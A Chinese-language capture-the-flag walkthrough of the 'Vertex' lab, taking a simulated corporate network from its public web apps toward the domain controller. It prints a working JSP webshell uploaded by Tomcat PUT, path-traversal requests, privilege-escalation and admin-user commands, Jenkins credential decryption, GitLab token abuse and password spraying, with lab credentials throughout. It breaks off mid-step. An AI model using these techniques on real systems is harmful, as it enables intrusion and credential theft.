Vertex
在这个靶场中,您将扮演一名渗透测试工程师,接受雇佣任务来评估 VertexSoft 科技有限公司的网络安全。VertexSoft 是一家专注于互联网与信息技术领域的领先公司,该公司致力于为客户提供卓越的数字解决方案,以满足各种业务需求。 您的任务是首先入侵公司在公网上暴露的应用程序,然后运用后渗透技巧深入 VertexSoft 公司的内部网络。在这个过程中,您将寻找潜在的弱点和漏洞,并逐一接管所有服务。最终的目标是接管域控制器,从而控制整个内部网络。靶场中共设置了8个Flag,它们分布在不同的靶机上,您需要找到并获取这些Flag作为您的成就目标。
1. flag01
1.1. 信息收集
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# fscan -h 8.130.151.6
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1
[796ms] 已选择服务扫描模式
[796ms] 开始信息扫描
[796ms] 最终有效主机数量: 1
[796ms] 开始主机扫描
[796ms] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb,
ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[796ms] 有效端口数量: 233
[846ms] [*] 端口开放 8.130.146.255:80
[894ms] [*] 端口开放 8.130.146.255:135
[894ms] [*] 端口开放 8.130.146.255:1433
[897ms] [*] 端口开放 8.130.146.255:139
[902ms] [*] 端口开放 8.130.146.255:8172
[921ms] [*] 端口开放 8.130.146.255:8000
[3.8s] 扫描完成, 发现 6 个开放端口
[3.8s] 存活端口数量: 6
[3.8s] 开始漏洞扫描
[3.9s] POC加载完成: 总共387个,成功387个,失败0个
[3.9s] [*] 网站标题 http://8.130.146.255 状态码:200 长度:43679 标题:VertexSoft
[4.0s] [*] NetInfo 扫描结果
目标主机: 8.130.146.255
主机名: WIN-IISSERER
发现的网络接口:
IPv4地址:
└─ 192.168.8.9
[4.3s] [*] 网站标题 http://8.130.146.255:8000 状态码:200 长度:4018 标题:Modbus Monitor - VertexSoft Internal Attendance System
[5.4s] [*] 网站标题 https://8.130.146.255:8172 状态码:404 长度:0 标题:无标题
[30.4s] 扫描已完成: 9/9
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# fscan -h 39.101.67.71
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1
[890ms] 已选择服务扫描模式
[890ms] 开始信息扫描
[890ms] 最终有效主机数量: 1
[890ms] 开始主机扫描
[890ms] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb,
ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[890ms] 有效端口数量: 233
[950ms] [*] 端口开放 39.101.67.71:22
[987ms] [*] 端口开放 39.101.67.71:8080
[3.9s] 扫描完成, 发现 2 个开放端口
[3.9s] 存活端口数量: 2
[3.9s] 开始漏洞扫描
[3.9s] POC加载完成: 总共387个,成功387个,失败0个
[4.6s] [*] 网站标题 http://39.101.67.71:8080 状态码:302 长度:0 标题:无标题 重定向地址: http://39.101.67.71:8080/login;jsessionid=8E2C1E43DFD93FFBF6972DDE810F3C3A
[5.0s] [*] 网站标题 http://39.101.67.71:8080/login;jsessionid=8E2C1E43DFD93FFBF6972DDE810F3C3A 状态码:200 长度:1383 标题:Master ERP login Form
[10.1s] [+] 目标: http://39.101.67.71:8080
漏洞类型: poc-yaml-springboot-env-unauth
漏洞名称: spring2
详细信息:
参考链接:https://github.com/LandGrey/SpringBootVulExploit
[46.4s] 扫描已完成: 3/3
IP: 39.101.67.71
端口: 22, 服务: SSH
端口: 8080, 服务: HTTP (服务: Master ERP)
漏洞: SpringBoot Env 未授权访问
1.2. SpringBoot 未授权 heapdump
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# dirsearch -u http://39.101.67.71:8080 -x 403,404
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/ChunQiu/Vertex/reports/http_39.101.67.71_8080/_26-01-22_06-17-58.txt
Target: http://39.101.67.71:8080/
[06:17:58] Starting:
[06:18:02] 400 - 435B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[06:18:03] 400 - 435B - /a%5c.aspx
[06:18:03] 200 - 2KB - /actuator
[06:18:03] 200 - 20B - /actuator/caches
[06:18:03] 200 - 6KB - /actuator/env
[06:18:03] 200 - 167B - /actuator/health
[06:18:04] 200 - 91KB - /actuator/beans
[06:18:04] 200 - 99KB - /actuator/conditions
[06:18:04] 200 - 2B - /actuator/info
[06:18:04] 200 - 54B - /actuator/scheduledtasks
[06:18:04] 200 - 1018B - /actuator/metrics
[06:18:04] 200 - 22KB - /actuator/mappings
[06:18:04] 200 - 14KB - /actuator/configprops
[06:18:04] 200 - 50KB - /actuator/loggers
[06:18:04] 200 - 71KB - /actuator/threaddump
>>>> [06:18:04] 200 - 33MB - /actuator/heapdump
[06:18:18] 200 - 1KB - /login
[06:18:18] 200 - 1KB - /login/
Task Completed
1.3. shiro
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# JDumpSpider-1.1-SNAPSHOT-full.jar heapdump
===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = GCM, key = Hl5LLC0EpW3KCUJrbe/FIQ==, algName = AES
/ >cat flag.txt
████████ ███████ ███████
░██░░░░░ ░██░░░░██ ░██░░░░██
░██ ░██ ░██ ░██ ░██
░███████ ░███████ ░███████
░██░░░░ ░██░░░██ ░██░░░░
░██ ░██ ░░██ ░██
░████████░██ ░░██░██
░░░░░░░░ ░░ ░░ ░░
flag{98e9c5e5-eb81-477a-8704-c81a116a6ef7}
2. flag02
IP: 8.145.32.249
主机名: WIN-IISSERER (内网IP: 192.168.8.9)
端口: 80, 服务: HTTP (标题: VertexSoft)
端口: 135, 服务: RPC
端口: 139, 服务: NetBIOS
端口: 1433, 服务: MSSQL
端口: 8000, 服务: HTTP (标题: Modbus Monitor - VertexSoft Internal Attendance System)
端口: 8172, 服务: HTTPS
2.1. 信息收集
80是一个静态网站
8000是一个考勤系统
可以被抓包修改注册用户的角色
export list可以获取到管理员的密码A1m!n@Qsx1Jn
2.2. 任意文件下载
观察这个下载文件的url,感觉可以下载任意文件
http://8.145.32.249:8000/User/DownloadFile?download=Export&fileName=users.csv
考虑到目标是ASP.NET网站,下载web.config
http://8.145.32.249:8000/User/DownloadFile?download=Export&fileName=../web.Config
这里因为IIS的限制,不允许下载
.config文件,可以使用大写绕过
从web.config中可以获取到mssql的账号密码
<connectionStrings>
<add
name="UserModel"
>>>> connectionString="data source=127.0.0.1;initial catalog=GuestDB;persist security info=True;user id=sa;password=Sa1pYbSM!dsQ;MultipleActiveResultSets=True;App=EntityFramework"
providerName="System.Data.SqlClient"
/>
</connectionStrings>
2.3. msssql
直接就是dba权限
目标不出网
传一个免杀shell上线
然后再传一个免杀的土豆创建一个管理员用户
beacon> shell C:\Users\Public\sp.exe -a "net localgroup administrators c1trus /add"
beacon> shell C:\Users\Public\sp.exe -a "net user c1trus Admin123 /add "
进去后就给df关了
flag{0079eeec-664d-4ee4-8099-b8907ee7a51f}
3. 内网代理
3.1. windows入口机
C:\Users\c1trus\Desktop>fscan -h 192.168.8.9/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1
[2.5s] 已选择服务扫描模式
[2.5s] 开始信息扫描
[2.5s] CIDR范围: 192.168.8.0-192.168.8.255
[2.5s] generate_ip_range_full
[2.5s] 解析CIDR 192.168.8.9/24 -> IP范围 192.168.8.0-192.168.8.255
[2.5s] 最终有效主机数量: 256
[2.5s] 开始主机扫描
[2.5s] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[2.6s] [*] 目标 192.168.8.12 存活 (ICMP)
[2.6s] [*] 目标 192.168.8.146 存活 (ICMP)
[2.6s] [*] 目标 192.168.8.16 存活 (ICMP)
[2.6s] [*] 目标 192.168.8.253 存活 (ICMP)
[2.7s] [*] 目标 192.168.8.26 存活 (ICMP)
[2.7s] [*] 目标 192.168.8.38 存活 (ICMP)
[2.7s] [*] 目标 192.168.8.42 存活 (ICMP)
[2.7s] [*] 目标 192.168.8.9 存活 (ICMP)
[5.6s] 存活主机数量: 8
[5.6s] 有效端口数量: 233
[5.6s] [*] 端口开放 192.168.8.12:88
[5.6s] [*] 端口开放 192.168.8.12:139
[5.6s] [*] 端口开放 192.168.8.12:135
[5.6s] [*] 端口开放 192.168.8.16:445
[5.6s] [*] 端口开放 192.168.8.16:135
[5.6s] [*] 端口开放 192.168.8.16:139
[5.6s] [*] 端口开放 192.168.8.146:22
[5.6s] [*] 端口开放 192.168.8.16:8080
[5.6s] [*] 端口开放 192.168.8.146:8080
[5.6s] [*] 端口开放 192.168.8.12:445
[5.6s] [*] 端口开放 192.168.8.12:389
[7.7s] [*] 端口开放 192.168.8.26:445
[7.7s] [*] 端口开放 192.168.8.26:139
[7.7s] [*] 端口开放 192.168.8.26:135
[8.2s] [*] 端口开放 192.168.8.26:8080
[8.6s] [*] 端口开放 192.168.8.38:445
[8.6s] [*] 端口开放 192.168.8.38:139
[8.6s] [*] 端口开放 192.168.8.38:135
[9.7s] [*] 端口开放 192.168.8.38:3306
[17.0s] [*] 端口开放 192.168.8.42:8060
[17.0s] [*] 端口开放 192.168.8.42:80
[17.0s] [*] 端口开放 192.168.8.42:22
[17.0s] [*] 端口开放 192.168.8.9:8000
[17.0s] [*] 端口开放 192.168.8.9:1433
[17.0s] [*] 端口开放 192.168.8.9:445
[17.0s] [*] 端口开放 192.168.8.9:139
[17.0s] [*] 端口开放 192.168.8.9:135
[17.0s] [*] 端口开放 192.168.8.9:80
[17.0s] [*] 端口开放 192.168.8.42:9094
[17.0s] [*] 端口开放 192.168.8.9:8172
[17.0s] 扫描完成, 发现 30 个开放端口
[17.0s] 存活端口数量: 30
[17.0s] 开始漏洞扫描
[17.1s] POC加载完成: 总共387个,成功387个,失败0个
[17.2s] [*] NetInfo 扫描结果
目标主机: 192.168.8.9
主机名: WIN-IISSERER
发现的网络接口:
IPv4地址:
└─ 192.168.8.9
[17.2s] [*] NetInfo 扫描结果
目标主机: 192.168.8.38
主机名: WIN-OPS88
发现的网络接口:
IPv4地址:
└─ 192.168.8.38
[17.2s] [*] NetInfo 扫描结果
目标主机: 192.168.8.16
主机名: WIN-SERVER03
发现的网络接口:
IPv4地址:
└─ 192.168.8.16
[17.2s] [*] NetInfo 扫描结果
目标主机: 192.168.8.26
主机名: WIN-PC3788
发现的网络接口:
IPv4地址:
└─ 192.168.8.26
[17.3s] [*] NetInfo 扫描结果
目标主机: 192.168.8.12
主机名: RODC
发现的网络接口:
IPv4地址:
└─ 192.168.8.12
[17.4s] [+] NetBios 192.168.8.16 WORKGROUP\WIN-SERVER03
[17.5s] [+] NetBios 192.168.8.12 DC:VERTEXSOFT\RODC
[17.5s] [*] 网站标题 http://192.168.8.9 状态码:200 长度:43679 标题:VertexSoft
[17.6s] [+] NetBios 192.168.8.38 WORKGROUP\WIN-OPS88
[17.6s] [+] NetBios 192.168.8.26 WORKGROUP\WIN-PC3788
[17.6s] [*] 网站标题 http://192.168.8.42 状态码:302 长度:99 标题:无标题 重定向地址: http://192.168.8.42/users/sign_in
[17.6s] [*] 网站标题 http://192.168.8.146:8080 状态码:302 长度:0 标题:无标题 重定向地址: http://192.168.8.146:8080/login;jsessionid=275366D7600AEA498B492BA73F6711EA
[17.6s] [*] 网站标题 http://192.168.8.42:8060 状态码:404 长度:555 标题:404 Not Found
[17.6s] [*] 网站标题 https://192.168.8.9:8172 状态码:404 长度:0 标题:无标题
[18.0s] [*] 网站标题 http://192.168.8.26:8080 状态码:200 长度:147 标题:第一个 JSP 程序
[18.2s] [*] 网站标题 http://192.168.8.146:8080/login;jsessionid=275366D7600AEA498B492BA73F6711EA 状态码:200 长度:1383 标题:Master ERP login Form
[19.3s] [*] 网站标题 http://192.168.8.16:8080 状态码:403 长度:594 标题:无标题
[19.5s] [*] 网站标题 http://192.168.8.42/users/sign_in 状态码:200 长度:11166 标题:登录 · GitLab
[22.0s] [+] MySQL 192.168.8.38:3306 root 123456
[22.3s] [*] 网站标题 http://192.168.8.9:8000 状态码:200 长度:4018 标题:Modbus Monitor - VertexSoft Internal Attendance System
[23.7s] [+] 目标: http://192.168.8.146:8080
漏洞类型: poc-yaml-springboot-env-unauth
漏洞名称: spring2
详细信息:
参考链接:https://github.com/LandGrey/SpringBootVulExploit
IP: 192.168.8.9 (入口机)
端口: 80, 服务: HTTP (站点: VertexSoft)
端口: 445, 服务: SMB
端口: 139, 服务: NetBIOS
端口: 135, 服务: RPC
端口: 1433, 服务: MSSQL
端口: 8000, 服务: HTTP (Modbus Monitor - VertexSoft Internal Attendance System)
端口: 8172, 服务: HTTPS
IP: 192.168.8.12
主机名: RODC
角色: 域控制器 (DC)
端口: 88, 服务: Kerberos
端口: 389, 服务: LDAP
端口: 445, 服务: SMB
端口: 139, 服务: NetBIOS
端口: 135, 服务: RPC
IP: 192.168.8.16
主机名: WIN-SERVER03
端口: 445, 服务: SMB
端口: 139, 服务: NetBIOS
端口: 135, 服务: RPC
端口: 8080, 服务: HTTP
IP: 192.168.8.26
主机名: WIN-PC3788
端口: 445, 服务: SMB
端口: 139, 服务: NetBIOS
端口: 135, 服务: RPC
端口: 8080, 服务: HTTP
IP: 192.168.8.38
主机名: WIN-OPS88
端口: 445, 服务: SMB
端口: 139, 服务: NetBIOS
端口: 135, 服务: RPC
端口: 3306, 服务: MySQL root 123456
IP: 192.168.8.42
端口: 22, 服务: SSH
端口: 80, 服务: HTTP
端口: 8060, 服务: HTTP
端口: 9094, 服务: 未知
应用: GitLab
访问地址: http://192.168.8.42/users/sign_in
IP: 192.168.8.146 (入口机)
端口: 22, 服务: SSH
端口: 8080, 服务: HTTP (应用: Master ERP)
漏洞: SpringBoot Env 未授权访问
C:\Users\c1trus\Desktop>agent.exe -bind 0.0.0.0:5555 -ignore-cert
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# ligolo-proxy -selfcert
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
ERRO[0000] Certificate cache error: acme/autocert: certificate cache miss, returning a new certificate
WARN[0000] TLS Certificate fingerprint for ligolo is: 077B13423C087EC4498E36E925B82784969E4612FBEE3969DC6385FDEBDA31B5
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/
Made in France ♥ by @Nicocha30!
Version: dev
ligolo-ng » connect_agent --ip 8.145.32.249:5555
? TLS Certificate Fingerprint is: 09DCC2BC11F6EF6F288E04162C3D70090BF7EA0D6E95DF7B4750F54C5345175B, connect? Yes
INFO[0023] Agent connected. id=00163e01a629 name="WIN-IISSERER\\c1trus@WIN-IISSERER" remote="8.145.32.249:5555"
ligolo-ng »
4. flag03 192.168.8.26
4.1. CVE-2017-12615 Tomcat put 文件上传
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# dirsearch -u http://192.168.8.26:8080/ -x 403,404
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/ChunQiu/Vertex/reports/http_192.168.8.26_8080/__26-01-22_08-11-08.txt
Target: http://192.168.8.26:8080/
[08:11:08] Starting:
[08:11:15] 400 - 795B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[08:11:16] 400 - 795B - /a%5c.aspx
[08:11:22] 302 - 0B - /backup -> /backup/
[08:11:22] 200 - 138B - /backup/
Task Completed
wp说是这个洞,但也没说为什么看出来的,我也没看出来
这里照着上传一个webshell
PUT /backup/upload/sim.jsp HTTP/1.1
Host: 192.168.8.26:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,
*/*
;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=A377FCF0DA5A1767C46C7478027926F9; JSESSIONID=0F908F3AE0576C6145257C8E9395272C
Connection: close
Content-Length: 956
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
4.2. 上线 土豆提权
目标没有杀软
直接传一个beacon上线
C:\apache-tomcat-8.5.71> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSystemtimePrivilege Change the system time Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
>>>> SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
用deadpotato上线system
[01/22 21:37:45] beacon> shell type C:\Users\Administrator\flag\flag.txt
[01/22 21:37:46] [*] Tasked beacon to run: type C:\Users\Administrator\flag\flag.txt
[01/22 21:37:46] [+] host called home, sent: 72 bytes
[01/22 21:37:52] [+] received output:
W W III N N PPPP CCC 333 77777 888 888
W W I NN N P P C 3 7 8 8 8 8
W W W I N N N --- PPPP C 33 7 888 888
W W W I N NN P C 3 7 8 8 8 8
W W III N N P CCC 333 7 888 888
flag{c37b368f-8585-47d7-adf2-0c04c8ef30a3}
5. flag04 192.168.8.16
IP: 192.168.8.16
主机名: WIN-SERVER03
端口: 445, 服务: SMB
端口: 139, 服务: NetBIOS
端口: 135, 服务: RPC
端口: 8080, 服务: HTTP
5.1. jenkins 弱口令
admin / admin123弱口令后台rce Jenkins
但是我们是system权限,直接创建一个本地管理员然后rdp上去
println "net user c2trus Admin123 /add".execute().text
println "net localgroup administrators c2trus /add".execute().text
_ ____ ____ ____ ____ _ __
/ | ____ |__ ||_ _|| ||__ || | \
| |__ |____| _/ / / \ ||_| | _/ / | || |
\___| |____||_/\_||_||_||____|\__|_|
flag{8bef2d26-91a8-481d-a883-cfd3b0e2ce5a}
6. flag05 192.168.8.42
IP: 192.168.8.42
端口: 22, 服务: SSH
端口: 80, 服务: HTTP
端口: 8060, 服务: HTTP
端口: 9094, 服务: 未知
应用: GitLab
访问地址: http://192.168.8.42/users/sign_in
6.1. gitlab
从jenkins的credentials.xml中可以获取到gitlab的api token
<?xml version='1.1' encoding='UTF-8'?>
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="credentials@1361.v56f5ca_35d21c">
<domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
<entry>
<com.cloudbees.plugins.credentials.domains.Domain>
<specifications/>
</com.cloudbees.plugins.credentials.domains.Domain>
<java.util.concurrent.CopyOnWriteArrayList>
>>>> <com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl plugin="gitlab-plugin@1.8.1">
<scope>GLOBAL</scope>
<id>84bc6224-fa06-489e-b746-f5dedb11a235</id>
<description></description>
>>>> <apiToken>{AQAAABAAAAAgqoi+w8f2N/rXi0qZEha5nGPamO0CIjokzT/a64spCEBqrIv7dFOC/dVxZwp+6CCU}</apiToken>
>>>> </com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl>
</java.util.concurrent.CopyOnWriteArrayList>
</entry>
</domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>
参考 jenkins 凭证解密解密即可
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# jenkins-credentials-decryptor -m master.key -s hudson.util.Secret -c credentials.xml
[
{
"apiToken": "glpat-2Z7YFA6k57s93VHMvHxh",
"id": "84bc6224-fa06-489e-b746-f5dedb11a235",
"scope": "GLOBAL"
}
]
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex/CodeSentinel]
└─# curl --header "PRIVATE-TOKEN:glpat-2Z7YFA6k57s93VHMvHxh" "http://192.168.8.42/api/v4/projects"| jq '.[].name'
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 21051 100 21051 0 0 53354 0 --:--:-- --:--:-- --:--:-- 53428
"VertexSoftBackup"
"Hexo"
"VertexApp"
"ERP_Old"
"PortalCode"
有五个项目
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex/CodeSentinel]
└─# git clone http://192.168.8.42:glpat-2Z7YFA6k57s93VHMvHxh@192.168.8.42/vertexsoft/vertexsoftbackup.git
Cloning into 'vertexsoftbackup'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (3/3), done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 6 (delta 0), reused 0 (delta 0), pack-reused 3
Receiving objects: 100% (6/6), done.
┌──(root㉿kali)-[~/…/ChunQiu/Vertex/CodeSentinel/vertexsoftbackup]
└─# ls
backup.txt README.md
┌──(root㉿kali)-[~/…/ChunQiu/Vertex/CodeSentinel/vertexsoftbackup]
└─# cat backup.txt
██████╗ ██╗████████╗██╗ █████╗ ██████╗
██╔════╝ ██║╚══██╔══╝██║ ██╔══██╗██╔══██╗
██║ ███╗██║ ██║ ██║ ███████║██████╔╝
██║ ██║██║ ██║ ██║ ██╔══██║██╔══██╗
╚██████╔╝██║ ██║ ███████╗██║ ██║██████╔╝
╚═════╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝╚═════╝
flag{7bc76381-d76e-45af-99d6-9ac19baabf53}
7. flag06 192.168.8.38
IP: 192.168.8.38
主机名: WIN-OPS88
端口: 445, 服务: SMB
端口: 139, 服务: NetBIOS
端口: 135, 服务: RPC
端口: 3306, 服务: MySQL
弱口令: MySQL root / 123456
7.1. mysql弱口令
直接创建管理员用户梭哈
这台机器是真几把卡,数据库连半天,rdp登半天
db d8b db d888888b d8b db .d88b. d8888b. .d8888. .d888b. .d888b.
88 I8I 88 `88' 888o 88 .8P Y8. 88 `8D 88' YP 88 8D 88 8D
88 I8I 88 88 88V8o 88 88 88 88oodD' `8bo. `VoooY' `VoooY'
Y8 I8I 88 88 88 V8o88 C8888D 88 88 88~~~ `Y8b. .d~~~b. .d~~~b.
`8b d8'8b d8' .88. 88 V888 `8b d8' 88 db 8D 88 8D 88 8D
`8b8' `8d8' Y888888P VP V8P `Y88P' 88 `8888Y' `Y888P' `Y888P'
flag{0d9d3afa-8c5c-43ca-8799-6b84355823c5}
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# ping 192.168.8.38
PING 192.168.8.38 (192.168.8.38) 56(84) bytes of data.
64 bytes from 192.168.8.38: icmp_seq=1 ttl=64 time=110 ms
64 bytes from 192.168.8.38: icmp_seq=2 ttl=64 time=110 ms
64 bytes from 192.168.8.38: icmp_seq=3 ttl=64 time=111 ms
^C
--- 192.168.8.38 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2001ms
rtt min/avg/max/mdev = 110.278/110.470/110.810/0.240 ms
延迟也不高啊,卡的批爆
8. flag07 192.168.8.12
IP: 192.168.8.12
主机名: RODC
角色: 域控制器 (DC)
端口: 88, 服务: Kerberos
端口: 389, 服务: LDAP
端口: 445, 服务: SMB
端口: 139, 服务: NetBIOS
端口: 135, 服务: RPC
在192.168.3.38 mysql这台机器的c:\users\administrator\documents\下可以发现一个密码本ROAdmins.xlsx
8.1. 密码喷洒
Username Password
IsabellaTech Nt5w0V4?Ff
LucasEther ur4aLwo!bB
NathanZen rXjfpYRn?Q
VictoriaVoid 4cd0?8euR6
SamuelStorm UzVXrDJ@B6
OliviaVoid Usq0gV!D52
MargaretStorm GbK3p!rDJE
CharlieCloud u!6vDaGQOA
全都是有效的只是密码过期了。
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# nxc smb 192.168.8.12 -u user.txt -p pass.txt --no-bruteforce --continue-on-success
SMB 192.168.8.12 445 RODC [*] Windows Server 2022 Build 20348 x64 (name:RODC) (domain:vertexsoft.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.8.12 445 RODC [-] vertexsoft.local\IsabellaTech:Nt5w0V4?Ff STATUS_PASSWORD_EXPIRED
SMB 192.168.8.12 445 RODC [-] vertexsoft.local\LucasEther:ur4aLwo!bB STATUS_PASSWORD_EXPIRED
SMB 192.168.8.12 445 RODC [-] vertexsoft.local\NathanZen:rXjfpYRn?Q STATUS_PASSWORD_EXPIRED
SMB 192.168.8.12 445 RODC [-] vertexsoft.local\VictoriaVoid:4cd0?8euR6 STATUS_PASSWORD_EXPIRED
SMB 192.168.8.12 445 RODC [-] vertexsoft.local\SamuelStorm:UzVXrDJ@B6 STATUS_PASSWORD_EXPIRED
SMB 192.168.8.12 445 RODC [-] vertexsoft.local\OliviaVoid:Usq0gV!D52 STATUS_PASSWORD_EXPIRED
SMB 192.168.8.12 445 RODC [-] vertexsoft.local\MargaretStorm:GbK3p!rDJE STATUS_PASSWORD_EXPIRED
SMB 192.168.8.12 445 RODC [-] vertexsoft.local\CharlieCloud:u!6vDaGQOA STATUS_PASSWORD_EXPIRED
SMB 192.168.8.12 445 RODC [+] vertexsoft.local\:
改下密码,然后抓bloodhound看看哪个用户比较有价值
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# bloodyAD --host 192.168.8.12 -d vertexsoft.local -u IsabellaTech -p 'Nt5w0V4?Ff' set password ADAM.SILVER Admin123
Traceback (most recent call last):
File "/root/.local/bin/bloodyAD", line 10, in <module>
sys.exit(main())
^^^^^^
File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/main.py", line 342, in main
asyncio.run(amain())
File "/root/.local/share/uv/python/cpython-3.12.11-linux-x86_64-gnu/lib/python3.12/asyncio/runners.py", line 195, in run
return runner.run(main)
^^^^^^^^^^^^^^^^
File "/root/.local/share/uv/python/cpython-3.12.11-linux-x86_64-gnu/lib/python3.12/asyncio/runners.py", line 118, in run
return self._loop.run_until_complete(task)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/root/.local/share/uv/python/cpython-3.12.11-linux-x86_64-gnu/lib/python3.12/asyncio/base_events.py", line 691, in run_until_complete
return future.result()
^^^^^^^^^^^^^^^
File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/main.py", line 272, in amain
output = await result
^^^^^^^^^^^^
File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/cli_modules/set.py", line 126, in password
ldap = await conn.getLdap()
^^^^^^^^^^^^^^^^^^^^
File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/network/config.py", line 154, in getLdap
self._ldap = await Ldap.create(self)
^^^^^^^^^^^^^^^^^^^^^^^
File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/network/ldap.py", line 211, in create
raise e
File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/network/ldap.py", line 199, in create
raise err
badldap.commons.exceptions.LDAPBindException: invalidCredentials — Reason:(SEC_E_LOGON_DENIED) The logon attempt failed.
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# nxc smb 192.168.8.12 -u IsabellaTech -p 'Nt5w0V4?Ff' -M change-password -o NEWPASS=Admin123
